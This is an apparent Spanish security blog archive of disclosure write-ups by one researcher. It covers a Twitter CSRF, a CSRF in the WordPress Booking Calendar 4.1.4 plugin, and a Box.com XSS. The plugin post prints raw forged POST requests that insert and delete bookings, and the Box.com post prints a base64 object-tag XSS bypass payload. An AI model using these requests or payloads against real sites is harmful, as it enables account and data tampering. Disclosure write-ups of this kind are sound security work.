Dylan Irzi Archives - WebSecurityDev

QR Code Malware Attack - Malioso Pixel

Malicioso Pixel – Attack QR Codes

By | Blog | No Comments

El Pasado 29 de Noviembre se llevo a cabo el Barcamp Security Editions 2014, un evento de seguridad informática que se lleva a cabo todos los años, la cual maneja la filosofia de “Desconferencia” del Barcamp pero enfocado en un evento donde solo se toquen temáticas de seguridad informática, de forma simultánea en las principales ciudades de Colombia y totalmente gratis.

BARCAMP SECURITY EDITIONS

Nuestro CEO, Dylan Irzi, ha presentado una charla, ‘Malicioso Pixel – Attack QR Codes’ y aqui queremos compartirles la presentación.

MALICIOSO PIXEL: QR ATTACK!

Los códigos QR en los últimos años han venido incrementándose en uso de campañas publicitarias, siendo una de la tendencias actuales en campañas de marketing, pero que sucedería si se suplantara esos código QR, colocando una URL maliciosa, o  Malware o hasta un USSD, y que tanto alcance podría tener? Y a quienes afectan este tipo de ataques? En conferencia dictare como podría afectar a una persona este tipo ataques,  como realizarlos y métodos de protección de ataques por medio de códigos QR.

 

Banner_JISI

Dispositivo Movil , Herramienta de Bolsillo de un Hacker.

By | Blog | No Comments

Hace poco estuve en Evento de ACIS ( Asociacion Colombiana de Ingenieros de Sistemas ) y organizan un evento anual de Hacking y Seguridad, la cual esta Jornada estuve compartiendo una charla junto a compañeros Sandra Ferreira & Ricardo Palacios.

Aqui le dejare Algunas Fotografias del evento y por su puesto la presentacion “Dispositivo Movil , Herramienta de Bolsillo de un Hacker.”

Read More

virus total

Ahora los Malwares Tienen Campaña de Adwords!

By | Blog | One Comment

Los Malwares se propagan de muchas maneras, ahora hasta realizan campañas en Google Adwords para propagarse.

 

Gran parte de personas que navegan por internet hoy en día, más de una vez han tenido experiencias con virus/malwares, y actualmente se conocen muchas técnicas que utilizan estos malware para ejecutarse en su computadora y ahora usan campañas en búsquedas para hacerse en estas.

Read More

CSRF: Un Nuevo Target.

By | Blog | 2 Comments

Hace poco Conocí realmente como funcionaba un ataque de CSRF, Pero todo en la vida Cada día aprendes algo nuevo. Y no sé si soy el único pero en esto me eh encontrado con situación realmente llamémosla “Interesante”.

Este post es para para compartir con ustedes, mi experiencias. Quizás le ayude a alguien más. Que este empezando a juguetear con esta vulnerabilidad Web.

Read More

Hackeando el Twitter Con Un Click.

By | Blog | No Comments

Buenas Noches mis lectores, tenia rato sin escribir, el trabajo , el estudio y mi novia me mantiene ocupado pero aqui volvi para compartirle uno de mis ultimos reportes.

El dia de ayer a al las 3:40 pm encontre un CSRF en Twitter ,la cual mas tarde me di cuenta que aplicaba a todo. este CSRF  Permitia que a partir de un link enviado de una cuenta atacante a una cuenta victima fuece hackeada !

realize multiples pruebas y todas salieron positivas , logre grabar un video y al final lo podra vizualizar.

Lo que me sorprendio fue que a las 10 am  de la mañana  (Hora Colombiana ) de dia de hoy  ( 04/09/13 ). Al seguir buscando vulnerabilidades en Twitter esta misma vulnerabilidad de CRSF Aplicaba para todo! , realize multiples PoC, en una logre “trinar”, en otra retweetear, en otra cambie el nombre del perfil, en otra la descripcion, todo esto con un simple archivo de html.

Como llege hasta la vulnerabilidad? estaba leyendo un articulo de mecanismo de doble autentificacion con tu numero de celular decidi intentarlo y mirar las cabezeras y probe eliminando token de seguridad que este tenia y wala! funciono.!

Esta vulnerabilidad consistia en que aun sin tener el token de seguridad valido , la operacion que se estaba solicitando se realizaba. en pocas palabras el token que tenia antes no funcionaba! estaba de lujo. por que esta aunque la borrase de la peticion, la peticion se ejecutaba.

Empezemos con el Reporte.

Titulo: CSRF En Twitter.com

Acerca del Autor: Dylan Irzi – Juan David Castro Cantillo. – Colombiano.

Independent Security Researcher de 17 años de edad, Con Hall Of Fame Owncloud, Microsoft / Adobe .
De la Ciudad de Barranquilla.

A Quien Afectaban: A Todos los usuarios.

Estatus de la Vulnerabilidad: Fixed!

Video de Prueba de Concepto:

Bueno depues de eso a las 4 de la tarde hora colombiana, se puso en modo mantemiento para reparar supongo que la vulnerabilidad.

ESTATUSCorreo de Confirmacion y reparacion de vulnerabilidad.

Twitter fixed

Eso ha sido todo el informe. la verdad ahora solo queda esperar que me coloquen en Hall Of Fame De  Twitter por WhiteHat. que segun el mail sera en unos dias.

Por Ultimo Agradecer a @SeguridadBlanca, @SrtadeDylan, @Armand0A , @Maldonad_Jeison, Por ayudarme Probar las PoC.
al Equipo de WebSecurityDev, y a Dios.

——————————————–

Att: Dylan Irzi

Independent Security Researche.

Happy Hacking!

Post CSRF

CSRF Plugin Booking Calendar 4.1.4 – WordPress

By | Blog | No Comments

Hola A Todos mis lectores!

Eh estado en las ultimas semana reportando fallos de Cross site scripting y se me ha olvidado mi antiguo laboratorio, Localhost. Pero hasta la semana pasada que tome el tiempo de fincho ( fin de semana ) para volver a usar plugins y buscar vulneabilidades como en viejos tiempos…

entonces revisando nuevos plugins en WordPress encontre un plugins de calendario. Booking Calendar 4.1.4, Y al hacer el proseso de prueba me dio buenos resultados.

Este plugin Trabaja con ajax, pero no maneja “token” lo cual eh alli el grave error, permitiendo asi Que modificando las cabezeras y enviando contenido por POST, sea capaz de realizar modificaciones a la base de datos. esta maneja una tabla especialmente para ella. “wp_booking

Ese dia. no puede haber nada mejor ” Firefox , Live HTTP Header, Firebug y tu Mente para realizar todo las pruebas con ese plugin

El resultado : Cross-Site Request Forgery For POST.

Ahora que recuerdo NO Intente si era vulnerable a POST SQLi Injeccion, :/ Creo que ese dia ya estaba full cansado en la noche para seguir en la prueba. igual si alguien os desea puede seguir mi y completar la labor con ese plugin.

En resumen aqui les dejo el Video!

A continuacion el primer codigo del exploit. para añadir un evento al calendario.

[code]POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

———————————————————–
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=(DATE)&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email

%5Eemail1%5test%40gmail.com~text%5Ephone1%5Etest~textarea

%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev

_active_locale=es_ES[/code] [code]Delete:
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

Post:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-

booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
Content-Length: 104
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

—————————

ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

———————————————————[/code]

Box.com

La Anecdota de Un Cross Site Scripting en Box.com

By | Blog | No Comments

[dropcap type=”1″]S[/dropcap]aludos, mis lectores, Despues de un tiempo de no escribir un post de seguridad aca estoy de vuelta!

Un Cross Site Scripting en Box.com

Box.com

Box.com

Estavez para contarle una anecdota de un #XSS, Buenos meses antes habia yo reportado un Cross Site Scripting en Box.com en la parte de “Bookmark” o marcadores, esta fue reparada en ese tiempo. y yo me di por bien servido. ( Report & Fixed )

Pero hace 2 dias quize volver a entrar e intentar buscar nuevos errores de seguridad, y llege nuevamente al “Bookmark” e intente con nuevos vectores que habia o si bien encontrado o visto en la red. para bypassear filtros XSS.

y casualmente en los primeros 3 intentos no dieron resultados, me tiraban error y demas.. pero llege a toparme con algo inusual.

Al introducir un vector HTML5 , Etiqueta “Video” Esta me mostraba… Asi.

Vector HTML5 - Cross Site scripting

Vector HTML5 – Cross Site scripting

Bueno dije si logro vizualizar esa etiqueta podra ejecutar otros vectores de HTML5. Puesto que de estos tengo varios y empeze a probar, algunos ejecutaban otros no, lo que se me hacia que habian “etiquetas” que estaban bloquedas para su uso.

IFRAMEAsh! ya llevaba 15 minutos y nada que lograba un que que saltara el filtro, ps si no ejecutaba un “Alert” para mi no es XSS. “Aunque un Cross Site Scripting es Mas que un simple alerta, vease… (Robano cuentas de Avira Por Cross Site Scripting) Retomando el tema.

Me sentia fustrado despues de casi 20 minutos de combinar vectores. hasta que logre encontre uno!

Que es Basicamente un combianacion de etiqueta “Button” “form” “object” en Base 64.

 

<form><button><object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=”>
</object></button></form>

pero No fue facil de ejecutarlo por que antes tenias que sobre poner un cierre de etiqueta ( “> ) para que este se ejecutara.. Asi.

XSS En Box.com

XSS En Box.com

Bueno Luego procedi a su reporte y las 24 Horas despues recibi la notificacion de las gracias y que ya habian reparado el Error de Seguridad.

Respuesta de Box.com

Respuesta de Box.com

Ahora me quedare esperando el mas espacio en el servicio de “Caja”. Jjejejee esos son algunos de los beneficios de ser WhiteHat.

Bueno mis lectores ! Gracias y nos leemos en otra post de seguridad. No Olviden Seguirme en twitter:

https://twitter.com/Dylan_irzi11

Un Saludo en Especial WebSecurityDev!.

Byt3s!